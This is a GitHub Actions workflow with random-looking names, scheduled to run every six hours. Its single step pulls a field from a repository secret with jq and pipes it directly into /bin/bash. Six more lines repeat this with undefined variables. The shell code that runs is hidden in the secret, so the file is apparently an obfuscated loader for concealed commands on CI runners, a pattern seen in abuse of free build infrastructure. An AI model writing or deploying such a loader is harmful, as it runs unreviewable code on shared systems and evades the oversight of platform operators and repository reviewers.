name: oushiyangg

on:
  workflow_dispatch:
  schedule:
    - cron: '51 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: oushiyangg
        env:
          rpou1776: ${{ secrets.rpou1776 }}
        run: |
          echo $rpou1776 | jq -r .rqy6471 | /bin/bash
          echo $rwx7077 | jq -r .saqu35488 | /bin/bash
          echo $twtpv79 | jq -r .q70897 | /bin/bash
          echo $moh597 | jq -r .ikx84574 | /bin/bash
          echo $p4 | jq -r .crr6889 | /bin/bash
          echo $eugy405 | jq -r .egva7888 | /bin/bash
          echo $k217 | jq -r .eoanj233 | /bin/bash

